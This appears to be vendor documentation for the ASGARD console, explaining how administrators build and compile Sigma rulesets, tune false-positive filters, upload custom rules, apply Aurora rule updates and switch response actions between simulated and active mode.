Sigma is a generic and open signature format that allows you to
describe relevant log events in a straightforward manner. The rule
format is very flexible, easy to write and applicable to any type
of log file. The main purpose of this project is to provide a
structured form in which researchers or analysts can describe their
once developed detection methods and make them shareable with others.
Sigma is for log files what Snort is for network traffic and
YARA is for files.
Rulesets group rules into manageable units. As an asset
can only have one service configuration, rulesets are used to determine
which rules are used in each service configuration. Default rulesets are
available for high and critical Sigma rules. To create a custom ruleset, go
to ServiceControl > Sigma > Rulesets > CreateRuleset.
If you selected automatic addition of new Sigma rules to the new ruleset,
they are added now. If you did not select any Sigma levels for automatic
addition, add the desired rules manually by going to ServiceControl >
Sigma > Rules. Select the checkboxes for the rules you want to add,
then click AddtoRuleset. A rule can be assigned to multiple rulesets.
You need to commit and push your changes after editing a ruleset.
ASGARD must restart the service controller to read new configurations.
To prevent multiple restarts when an administrator performs several
configuration changes in succession, the administrator must initiate
the reload of the new configuration by going to ServiceControl >
Sigma > Rulesets and performing the Compile ruleset action
(gear wheels). The need for compiling is indicated in the Uncompiled Changes
column.
We do not recommend enabling all available rules on an asset. Start with all
"critical" rules, then advance to all "high" rules. Default rulesets are
available for both levels. "Medium" rules should not be enabled in bulk, and
"low" or "informational" rules should generally remain disabled. Individual
medium rules that increase an organization's detection coverage without
triggering many false positives can be added to the active configuration, but
should be tested rule by rule.
To add rules to a ruleset more easily, use the column filters to select the
desired rules and add them in bulk to a ruleset. For example, you can add all
rules with level "critical" to a ruleset:
You can also search the title or description field of the rules. To search
the rule itself, use the "Rule" column. The "Rule" column is not shown by
default and must be added with the gear wheel button.
Each environment is different. Some rules may trigger false positive matches
in your environment. You have multiple options to address this.
If it is a general false positive that is not limited to your environment,
consider reporting it as a GitHub issue
or by email to rules@nextron-systems.com. We will take care of the tuning
for you and other users.
If the false positive is specific to your environment, you can tune single Sigma rules
at ServiceControl > Sigma > Rules, filter for the rule in question and
choose the "Edit false positive filters of this rule" action. Here you can
perform simple rule tuning. Click the AddFalsePositiveFilter button
to add individual lines that filter the event for false positives. These
lines are OR-connected, which means: "Do not match the event if any of
those lines matches." They are applied on top of the rule logic and persist
through automatic rule updates.
Example of the false positive tuning of a Sigma rule
To see the resulting rule, click the "Show Preview" button or look at the
"Compiled Rule" row in the rule's drop-down menu.
To review tuned rules, add the "Filters" column to your view using the
gear wheels icon, then show all non-empty rows by using the NOT-
column filter.
If the rule adds too much noise and tuning is not practical, you can remove
the rule from the ruleset for a subset of your systems. This may require a
separate ruleset for that use case. You can also disable the rule entirely
with the Disablethisrule action. Disabling the rule affects it in all
rulesets.
After tuning a rule, the rulesets using that rule must be recompiled at
ServiceControl > Sigma > Rulesets.
Custom rules can be added using the Sigma format according to the
specification. You can
upload single files or a ZIP compressed archive. This can be done at
ServiceControl > Sigma > Rules > UploadRules.
If new rules or rule updates are provided by the Aurora signatures, the user
must apply the updates manually before they affect Aurora agents managed by
ASGARD. An indicator is shown in the Web UI, and rule changes can be reviewed
and applied at ServiceControl > Sigma > RuleUpdates.
Clicking the Update button in the "Update Available" column opens a diff
view that shows the changes and allows the user to apply or discard them. If
you do not need to review each individual change, you can apply all
changes using the UpdateAllRules button.
Response action updates can be viewed and applied at
ServiceControl > Sigma > ResponseUpdates.
As a fail-safe and for administration purposes, responses are generally
only simulated if not explicitly set to active.
This must be done at different levels:
Service configuration level
Ruleset configuration level (on updates)
Ruleset rule level
If a rule is simulated at any level, it does not execute the response
actions. It only generates a log line that describes the action that would
have been performed. You can see an overview of the state of all
responses in the ServiceControl > Aurora > Configurations menu.
indicates whether responses are activated at the configuration level. Edit the configuration to change it.
indicates how many rules are simulated in that ruleset, or in total.
indicates how many rules have active responses in that ruleset, or in total.
To change the status of a response in the ruleset, click the ruleset link.
You can view all simulated or all active responses. Use the checkbox and
the button in the upper-right corner to switch the response status of the rules
between active and simulated.
The default response mode of a ruleset is important for the
behavior of response updates. It can be seen at ServiceControl >
Sigma > Rulesets in the DefaultResponseMode column.
If "Simulation" is selected, response actions of new and updated rules are
put in simulation mode. If "Active" is selected, new rules are automatically
put in active mode and updated rules do not change their current response
mode. We recommend leaving the default response mode set to "Simulation".
